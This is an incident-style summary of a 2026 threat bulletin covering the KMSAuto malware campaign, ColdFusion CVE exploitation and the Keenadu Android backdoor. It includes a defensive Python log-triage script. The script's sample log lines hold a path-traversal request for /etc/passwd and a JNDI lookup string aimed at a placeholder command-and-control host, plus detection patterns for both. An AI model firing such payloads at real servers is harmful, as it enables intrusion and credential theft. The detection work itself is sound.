Full Report
The first ThreatsDay Bulletin of 2026 lands on a day that already feels symbolic — new year, new breaches, new tricks. If the past twelve months taught defenders anything, it’s that threat actors don’t pause for holidays or resolutions. They just evolve faster. This week’s round-up shows how subtle shifts in behavior, from code tweaks to job scams, are rewriting what “cybercrime” looks like in
Analysis Summary
# Incident Report: Compilation of Early 2026 Threat Activities
## Executive Summary
This report summarizes multiple distinct threat activities identified in the first ThreatsDay Bulletin of 2026. The incidents range from malware distributed under the lure of illegal software activation (`KMSAuto`), to widespread exploitation of unpatched Adobe `ColdFusion` servers, to the discovery of pre-installed malware on consumer `Android` devices. The overarching theme is the calculated evolution of threat actor tactics, exploiting both unpatched infrastructure and social engineering vectors (e.g., fake software).
## Incident Details
- Discovery Date: January 1, 2026 (Date of Bulletin Publication)
- Incident Date: April 2020 to January 2023 (KMSAuto); Christmas 2025 holiday period (ColdFusion)
- Affected Organization: Multiple unspecified organizations and users worldwide (KMSAuto, ColdFusion); various Android tablet manufacturers and their users (Keenadu)
- Sector: Software, End-User Computing, Various (Specific targets of exploitation)
- Geography: Global (Lithuania/South Korea jurisdiction for arrest; Exploitation traffic across U.S., Spain, India, Canada, Chile, Germany, etc.)
## Timeline of Events
### Initial Access
- Date/Time: April 2020 – January 2023 (KMSAuto); Christmas 2025 Holiday Period (ColdFusion)
- Vector: Disguised downloads (KMSAuto); Unpatched vulnerabilities (ColdFusion)
- Details:
  * **KMSAuto:** The threat actor distributed malware disguised as legitimate Key Management Service (KMS) activation tools for Windows/Office, tricking 2.8 million users into downloading a malicious executable.
  * **ColdFusion:** A single threat actor systematically exploited over 10 known Adobe ColdFusion CVEs from 2023 and 2024.
### Lateral Movement
- **ColdFusion:** Post-exploitation payloads were observed performing direct code execution and JNDI lookups, suggesting preparation for deeper network traversal or resource access.
### Data Exfiltration/Impact
- **KMSAuto:** Stole virtual assets (cryptocurrency) from users across 3,100 virtual asset addresses, totaling approximately KRW 1.7 billion ($1.2 million) across 8,400 transactions.
- **Keenadu (Android):** The discovered backdoored library (`libandroid_runtime.so`) implies potential for remote access, data exfiltration, and command execution on affected tablets.
- **ColdFusion:** Credential harvesting (specifically accessing `/etc/passwd`) was noted as part of the exploitation routine.
### Detection & Response
- **KMSAuto:** The campaign was identified, leading to the arrest of the 29-year-old Lithuanian national involved and his extradition by South Korean authorities.
- **ColdFusion:** Detected by GreyNoise, which tracked coordinated exploitation traffic originating primarily from Japan-based infrastructure.
- **Keenadu:** Discovered through forensic analysis by Kaspersky researchers.
## Attack Methodology
Because this report covers several independent incidents, each technique below is attributed to the incident in which it was observed:
- **Initial Access:** Social Engineering/Trojanized Software (KMSAuto); Exploitation of known CVEs (ColdFusion).
- **Persistence:** Not explicitly stated for exploitation incidents, but the **Keenadu** malware suggests system-level persistence via a backdoored library.
- **Privilege Escalation:** Not detailed, but implied by access to OS files (`/etc/passwd`) and code execution capabilities in ColdFusion exploits.
- **Defense Evasion:** Use of seemingly legitimate software wrappers (KMSAuto) to bypass security controls.
- **Credential Access:** Direct file access to configuration/credential stores (`/etc/passwd` harvested in ColdFusion attacks).
- **Discovery:** Not detailed, but exploitation often includes C2 beaconing or system checks.
- **Lateral Movement:** **ColdFusion payloads** enabled direct code execution necessary for movement.
- **Collection:** Clipboard-stealing (KMSAuto); System file access (ColdFusion).
- **Exfiltration:** Direct theft of virtual assets (KMSAuto).
- **Impact:** Financial theft (KMSAuto); System control/data access (ColdFusion/Keenadu).
## Impact Assessment
- **Financial:** Significant direct financial loss identified in the KMSAuto campaign ($1.2 million in stolen digital assets).
- **Data Breach:** Harvesting of system credentials (`/etc/passwd`) and potential PII/data exfiltration due to backdoors (Keenadu).
- **Operational:** Exposure of enterprise ColdFusion servers to sustained, systematic exploitation, risking full system compromise.
- **Reputational:** Negative impact on users who downloaded malicious software (KMSAuto) or purchased backdoored hardware (Keenadu).
## Indicators of Compromise
*Note: No specific indicators (IPs/Hashes) were provided in the summary text, only CVEs and observed attack source regions.*
- **Network indicators:** Coordinated exploitation traffic observed originating primarily from Japanese IP infrastructure (for ColdFusion).
- **File indicators:** Malicious executable disguised as KMSAuto software. Backdoor found in `libandroid_runtime.so` (Keenadu).
- **Behavioral indicators:** Leveraging JNDI lookups post-exploitation.
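The two behavioural indicators the report names, requests that read `/etc/passwd` and JNDI lookup strings, can be triaged directly from web-server logs. The following is an added example, not code from the bulletin or from GreyNoise: it parses constructed log lines (the log format, addresses, paths and hostnames are all assumptions), flags each source that triggers a rule, and then groups flagged sources by shared /24 as a rough stand-in for the "coordinated infrastructure" observation.

```python
import re
from collections import defaultdict
from urllib.parse import unquote

# Constructed sample log lines (not from the bulletin), one request per line:
#   <client_ip> [<timestamp>] "<method> <uri> <proto>" <status> "<user-agent>"
# All addresses, paths and hostnames are placeholders.
SAMPLE_LOG = """\
203.0.113.10 [26/Dec/2025:02:14:03 +0000] "GET /index.cfm HTTP/1.1" 200 "Mozilla/5.0"
203.0.113.10 [26/Dec/2025:02:14:05 +0000] "GET /app.cfm?f=..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1" 200 "curl/8.0"
203.0.113.44 [26/Dec/2025:02:15:09 +0000] "POST /app.cfm HTTP/1.1" 500 "${jndi:ldap://c2.example.invalid/x}"
198.51.100.7 [26/Dec/2025:03:01:00 +0000] "GET /index.cfm HTTP/1.1" 200 "Mozilla/5.0"
"""
LINE_RE = re.compile(r'^(\S+) \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) "([^"]*)"$')

# Behavioural indicators the report names: reads of /etc/passwd and JNDI lookups.
# Matching runs on the URL-decoded URI so percent-encoded traversal is not missed.
RULES = {
    "etc_passwd_read": re.compile(r"/etc/passwd", re.I),
    "jndi_lookup": re.compile(r"\$\{\s*jndi:", re.I),
}

def parse_line(line):
    """Parse one log line into a dict, or return None if it does not match the format."""
    m = LINE_RE.match(line)
    if not m:
        return None
    ip, ts, method, uri, status, ua = m.groups()
    # Decode twice so a double-encoded traversal (%252F) is also normalised.
    return {"ip": ip, "ts": ts, "method": method, "uri": unquote(unquote(uri)),
            "status": int(status), "ua": ua}

def detect(log_text):
    """Return {client_ip: sorted rule names} for every source that triggered a rule."""
    hits = defaultdict(set)
    for raw in log_text.splitlines():
        rec = parse_line(raw)
        if rec is None:
            continue  # skip malformed lines rather than abort the triage run
        for name, pattern in RULES.items():
            if pattern.search(rec["uri"]) or pattern.search(rec["ua"]):
                hits[rec["ip"]].add(name)
    return {ip: sorted(names) for ip, names in hits.items()}

def shared_prefixes(hits, octets=3):
    """Group flagged sources by /24 as a coarse stand-in for 'same infrastructure'."""
    groups = defaultdict(list)
    for ip in hits:
        groups[".".join(ip.split(".")[:octets])].append(ip)
    return {p: sorted(ips) for p, ips in groups.items() if len(ips) > 1}
```

A real deployment would swap the /24 grouping for ASN or GeoIP enrichment, which is how the Japan-based origin in the report would actually be surfaced.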
## Response Actions
- **Containment:** Coordinated international action leading to the arrest and extradition of the primary KMSAuto distributor.
- **Eradication:** Public disclosure and analysis by security researchers (Kaspersky, GreyNoise) enabling affected parties to patch or remove the threats.
- **Recovery:** Not detailed, but immediate patching of actively exploited ColdFusion CVEs would be required.
## Lessons Learned
- **Software Lures Persist:** Criminals continue to successfully leverage high-demand "cracked" software (KMSAuto) as an extremely effective initial access vector, netting significant returns over a long timeframe (2020-2023).
- **Patch Backlog Exploitation:** Threat actors capitalize on holiday downtimes or slow organizational response to systematically exploit known, older vulnerabilities (10+ CVEs from 2023-2024 targeted over Christmas 2025).
- **Supply Chain Risk:** Pre-installed malware on hardware (Keenadu on Android tablets) represents a hard-to-detect, deep layer of compromise.
## Recommendations
- **Vulnerability Management:** Prioritize immediate patching of high-impact, internet-facing services such as Adobe ColdFusion, especially those with known remote code execution (RCE) or RCE-precursor vulnerabilities.
- **Endpoint Security:** Implement enhanced EDR/AV inspection for software installations, particularly around activation utilities or commonly pirated software.
- **Hardware Trust:** Establish stronger security protocols for validating the integrity of consumer hardware and pre-installed applications before deployment in corporate environments or by employees.